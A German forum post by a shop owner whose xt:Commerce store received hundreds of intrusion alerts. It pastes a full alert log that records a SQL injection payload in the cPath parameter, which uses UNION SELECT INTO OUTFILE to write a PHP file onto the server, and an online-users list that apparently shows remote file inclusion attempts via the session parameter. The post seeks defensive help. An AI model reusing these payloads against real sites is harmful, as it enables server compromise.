Hallo,
Mein Shop ist jetzt offline.
Gestern Abend sind 160 Mails, dann heute als ich mein PC eingeschaltet habe ca. 280 Attempted hack on your site? (type: Intrusion detection.) gekommen...beide male haben wir den Shop gleich unerreichbar macht.
Mailinhalt:
Attention site admin of Melinda Silbermode, On DATE_FORMAT_LONG at DATE_TIME_FORMAT_SHORT the xt:C System has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did! Anyway, it was detected and blocked. The suspicious activity was recognized in /homepages/46/d132898374/htdocs/silber/inc/xtc_Security.inc.php on line 68, and is of the type xt:C Security Alert. Additional information given by the code which detected this: Intrusion detection. Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it. ===================================== Information about this user: ===================================== This person is not logged in. IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on] IP according to HTTP_CLIENT_IP: IP according to REMOTE_ADDR: 80.64.198.5 IP according to GetHostByName(80.64.198.5): 80.64.198.5 ===================================== Information in the $_REQUEST array ===================================== REQUEST * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' REQUEST * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_GET array This is about variables that may have been in the URL string or in a 'GET' type form. ===================================== GET * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' GET * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_POST array This is about visible and invisible form elements. ===================================== ===================================== Browser information ===================================== HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) BROWSER * browser_name_regex : ^mozilla/4\.0 (compatible; msie 7\.0.*;.*windows nt 5\.1.*\.net clr 1.*).*$ BROWSER * browser_name_pattern : Mozilla/4.0 (compatible; MSIE 7.0*;*Windows NT 5.1*.NET CLR 1*)* BROWSER * parent : IE 7.0 BROWSER * platform : WinXP BROWSER * netclr : 1 BROWSER * browser : IE BROWSER * version : 7.0 BROWSER * majorver : 7 BROWSER * minorver : 0 BROWSER * css : 2 BROWSER * frames : 1 BROWSER * iframes : 1 BROWSER * tables : 1 BROWSER * cookies : 1 BROWSER * backgroundsounds : 1 BROWSER * vbscript : 1 BROWSER * javascript : 1 BROWSER * javaapplets : 1 BROWSER * activexcontrols : 1 BROWSER * cdf : 1 BROWSER * aol : BROWSER * beta : 1 BROWSER * win16 : BROWSER * crawler : BROWSER * stripper : BROWSER * wap : BROWSER * ismobiledevice : BROWSER * ak : BROWSER * sk : ===================================== Information in the $_SERVER array ===================================== SERVER * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs SERVER * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* SERVER * HTTP_ACCEPT_LANGUAGE : en-us SERVER * HTTP_CONNECTION : Close SERVER * HTTP_HOST : www.melinda.at SERVER * HTTP_UA_CPU : x86 SERVER * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) SERVER * PATH : /bin:/usr/bin SERVER * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * REDIRECT_SCRIPT_URL : /silber/index.php SERVER * REDIRECT_STATUS : 200 SERVER * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * REDIRECT_URL : /silber/index.php SERVER * REMOTE_ADDR : 80.64.198.5 SERVER * REMOTE_PORT : 40815 SERVER * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * SCRIPT_URL : /silber/index.php SERVER * SERVER_ADDR : 82.165.87.12 SERVER * SERVER_ADMIN :
[email protected] SERVER * SERVER_NAME : melinda.at SERVER * SERVER_PORT : 80 SERVER * SERVER_SIGNATURE : SERVER * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 SERVER * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * GATEWAY_INTERFACE : CGI/1.1 SERVER * SERVER_PROTOCOL : HTTP/1.0 SERVER * REQUEST_METHOD : GET SERVER * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * SCRIPT_NAME : /silber/index.php SERVER * PATH_INFO : /silber/index.php SERVER * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * STATUS : 200 SERVER * PHP_SELF : /silber/index.php SERVER * argv : Array SERVER * argc : 1 ===================================== Information in the $_ENV array ===================================== ENV * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs ENV * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* ENV * HTTP_ACCEPT_LANGUAGE : en-us ENV * HTTP_CONNECTION : Close ENV * HTTP_HOST : www.melinda.at ENV * HTTP_UA_CPU : x86 ENV * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) ENV * PATH : /bin:/usr/bin ENV * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * REDIRECT_SCRIPT_URL : /silber/index.php ENV * REDIRECT_STATUS : 200 ENV * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * REDIRECT_URL : /silber/index.php ENV * REMOTE_ADDR : 80.64.198.5 ENV * REMOTE_PORT : 40815 ENV * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * SCRIPT_URL : /silber/index.php ENV * SERVER_ADDR : 82.165.87.12 ENV * SERVER_ADMIN :
[email protected] ENV * SERVER_NAME : melinda.at ENV * SERVER_PORT : 80 ENV * SERVER_SIGNATURE : ENV * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 ENV * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * GATEWAY_INTERFACE : CGI/1.1 ENV * SERVER_PROTOCOL : HTTP/1.0 ENV * REQUEST_METHOD : GET ENV * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * SCRIPT_NAME : /silber/index.php ENV * PATH_INFO : /silber/index.php ENV * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * STATUS : 200 ===================================== Information in the $_COOKIE array ===================================== ===================================== Information in the $_FILES array ===================================== ===================================== Information in the $_SESSION array This is session info.=====================================
zur Zeit waren Online lt. Shop:
Online ID Name IP Adresse Startzeit Letzter Klick Letzte URL
00:06:54 0 Guest 80.64.198.5 20:19:27 20:19:27 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.qubestun
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.clubnata
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Frabotnitsa.r
00:07:00 0 Guest 80.64.198.5 20:19:21 20:21:41 /silber/product_info.php?cPath=29&products_id=134&
00:06:45 0 Guest 88.117.54.115 20:19:36 20:19:51 /silber/product_info.php?products_id=103&cPath=30
00:04:45 0 Guest 80.64.198.5 20:21:36 20:21:44 /silber/create_guest_account.php?
und natürlich ich war online...
wäre für jede Hilfe sehr dankbar...
lieben Gruß an Alle!